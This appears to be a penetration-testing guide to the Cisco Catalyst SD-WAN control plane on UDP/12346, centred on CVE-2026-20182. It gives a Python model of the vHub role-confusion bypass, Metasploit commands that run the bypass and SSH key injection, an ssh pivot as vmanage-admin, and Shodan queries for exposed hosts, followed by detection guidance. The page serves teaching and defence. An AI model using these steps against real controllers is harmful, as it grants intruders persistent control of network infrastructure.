12346/udp - Pentesting Cisco Catalyst SD-WAN Control Plane

Basic Information

Cisco Catalyst SD-WAN controllers expose a DTLS control-plane service on UDP/12346, served by the vdaemon process. Treat it like a routing-adjacency surface: a peer that the controller accepts as authenticated is trusted with control-plane messages, so an attacker who can become such a peer may be able to pivot into the overlay fabric.

vdaemon uses a 12-byte header where the high nibble of device_info encodes the claimed device role:

Role value   Claimed role
1            vEdge
2            vHub
3            vSmart
4            vBond
5            vManage
6            ZTP

Completing the DTLS handshake does not by itself authenticate a peer. Trust is established later by control-plane bootstrap messages such as CHALLENGE_ACK, so the role checks inside those handlers are what actually gate the adjacency.

Default port: 12346/udp

PORT      STATE SERVICE
12346/udp open  unknown

Enumeration

Discover the control-plane service and the follow-on management ports. UDP ports that do not answer nmap's probe are reported as open|filtered, so correlate the UDP result with the TCP services on the same host:

nmap -sU -sV -p12346 <IP>
nmap -sT -sV -p22,830 <IP>

If the host exposes TCP/830, check whether NETCONF over SSH is reachable. NETCONF runs as an SSH subsystem, so request it with -s; a reachable server answers with an XML <hello> listing its capabilities:

ssh -p 830 -s <user>@<IP> netconf

Pentesting Cisco SD-WAN Control Plane

Pre-auth Role Confusion

CHALLENGE_ACK (message type 9) is reachable before authentication because it is part of the control-plane bootstrap allowlist. In CVE-2026-20182, Rapid7 showed that vbond_proc_challenge_ack() verified some roles (vEdge, vSmart, vManage) but had no verification branch for claimed role 2 / vHub.

Because the function later fell through to peer->authenticated = 1, an attacker could:

  1. Complete DTLS with any certificate.
  2. Send CHALLENGE_ACK with the high nibble of device_info set to 2.
  3. Send Hello.
  4. Transition to an UP authenticated peer.

This is a useful bug pattern to hunt in proprietary control planes: attacker-controlled role selection, missing default-deny validation, and pre-auth handshake messages.

Post-auth Pivot

Once treated as an authenticated peer, the controller accepted MSG_VMANAGE_TO_PEER (message type 14) and appended attacker-controlled data to /home/vmanage-admin/.ssh/authorized_keys.

This turns a control-plane foothold into persistent NETCONF over SSH access on TCP/830 as vmanage-admin.
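The following Python model ties together the pre-auth role confusion above (attacker-chosen role in the high nibble, no verification branch for vHub, fall-through to peer->authenticated = 1) and the post-auth MSG_VMANAGE_TO_PEER key write, and shows the default-deny form of the CHALLENGE_ACK handler beside the vulnerable one. It is an added illustration, not Rapid7's module or Cisco's code. The header layout it packs (msg_type at offset 0, device_info at offset 1, ten reserved bytes) is an assumption; the page only states that the header is 12 bytes and that the role is the high nibble of device_info. The Hello step is modeled as a state transition because its message-type number is not given, and the sample public key is constructed.

```python
"""Model of the vdaemon bootstrap allowlist, the vHub role fall-through and the
post-auth authorized_keys write. Added illustration; header layout assumed."""
import struct

HDR_LEN = 12
MSG_CHALLENGE_ACK = 9        # message type from the page
MSG_VMANAGE_TO_PEER = 14     # message type from the page
ROLE_VEDGE, ROLE_VHUB, ROLE_VSMART, ROLE_VBOND, ROLE_VMANAGE, ROLE_ZTP = 1, 2, 3, 4, 5, 6
ROLE_NAMES = {1: "vEdge", 2: "vHub", 3: "vSmart", 4: "vBond", 5: "vManage", 6: "ZTP"}
PREAUTH_ALLOWLIST = {MSG_CHALLENGE_ACK}   # reachable before peer->authenticated is set


def build_header(msg_type, role, low_nibble=0):
    """Pack the (assumed) 12-byte header; the claimed role is the high nibble of device_info."""
    assert 0 <= role <= 15 and 0 <= low_nibble <= 15
    return struct.pack("!BB10x", msg_type, (role << 4) | low_nibble)


def parse_header(hdr):
    """Return (msg_type, claimed_role) from a 12-byte header."""
    if len(hdr) != HDR_LEN:
        raise ValueError("header must be exactly 12 bytes")
    msg_type, device_info = struct.unpack("!BB10x", hdr)
    return msg_type, device_info >> 4


class Peer:
    def __init__(self, cert_verified):
        self.cert_verified = cert_verified  # did the DTLS certificate chain to the trusted CA?
        self.authenticated = 0
        self.state = "INIT"


def verify_claimed_role(peer, role):
    """Stand-in for the per-role verification branches that exist for vEdge, vSmart, vManage."""
    return peer.cert_verified


# No entry for ROLE_VHUB: this is the missing branch.
ROLE_VERIFIERS = {ROLE_VEDGE: verify_claimed_role,
                  ROLE_VSMART: verify_claimed_role,
                  ROLE_VMANAGE: verify_claimed_role}


def vulnerable_proc_challenge_ack(peer, role):
    verify = ROLE_VERIFIERS.get(role)
    if verify is not None and not verify(peer, role):
        return False
    peer.authenticated = 1      # fall-through: reached for any role without a verifier
    return True


def hardened_proc_challenge_ack(peer, role):
    verify = ROLE_VERIFIERS.get(role)
    if verify is None or not verify(peer, role):
        return False            # default-deny: a role with no branch gets no trust
    peer.authenticated = 1
    return True


def dispatch(peer, hdr, payload, challenge_ack_handler, authorized_keys):
    """Allowlist gate plus the two handlers the page describes."""
    msg_type, claimed_role = parse_header(hdr)
    if msg_type not in PREAUTH_ALLOWLIST and not peer.authenticated:
        return False
    if msg_type == MSG_CHALLENGE_ACK:
        return challenge_ack_handler(peer, claimed_role)
    if msg_type == MSG_VMANAGE_TO_PEER:
        authorized_keys.append(payload.decode())   # attacker-controlled data appended verbatim
        return True
    return False


def run_attack_chain(peer, role, challenge_ack_handler, pubkey):
    """Steps 2-4 plus the key write. Returns (final peer state, authorized_keys contents)."""
    keys = []
    ok = dispatch(peer, build_header(MSG_CHALLENGE_ACK, role), b"", challenge_ack_handler, keys)
    if ok and peer.authenticated:
        peer.state = "UP"       # Hello: only an authenticated peer comes UP
    dispatch(peer, build_header(MSG_VMANAGE_TO_PEER, role), pubkey, challenge_ack_handler, keys)
    return peer.state, keys


if __name__ == "__main__":
    rogue_key = b"ssh-ed25519 AAAAC3constructed attacker"   # constructed sample, not a real key
    for handler in (vulnerable_proc_challenge_ack, hardened_proc_challenge_ack):
        state, keys = run_attack_chain(Peer(cert_verified=False), ROLE_VHUB, handler, rogue_key)
        print(f"{handler.__name__}: role={ROLE_NAMES[ROLE_VHUB]} cert=unverified -> {state}, keys={keys}")
```

With the vulnerable handler an unverified peer claiming vHub ends UP with its key appended; the hardened handler rejects it at CHALLENGE_ACK, and type 14 is then refused by the allowlist gate.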

# Rapid7 module automating the vHub auth bypass and SSH key injection
msf6 > use auxiliary/admin/networking/cisco_sdwan_vhub_auth_bypass
msf6 auxiliary(cisco_sdwan_vhub_auth_bypass) > set RHOSTS <IP>
msf6 auxiliary(cisco_sdwan_vhub_auth_bypass) > run

# If the target accepts the injected key, pivot to NETCONF over SSH (NETCONF is an SSH subsystem, hence -s)
ssh -i <loot_key.pem> -p 830 -s vmanage-admin@<IP> netconf

Review similar appliances for post-auth messages that write SSH keys, API tokens, trust bundles, or bootstrap secrets for privileged internal service accounts.

Detection

  • Audit Internet-facing or cross-trust-boundary exposure of UDP/12346 and TCP/830; the control plane should only be reachable from the SD-WAN fabric and management networks.
  • Inspect /home/vmanage-admin/.ssh/authorized_keys for unexpected appended keys after control-plane events, and baseline the file so that any entry not provisioned at build time stands out.
  • Monitor NETCONF sessions on TCP/830 as vmanage-admin, not only interactive SSH: an attacker holding only NETCONF access can still retrieve configuration and state without a normal shell.

Shodan

  • port:12346
  • port:830 "NETCONF"

References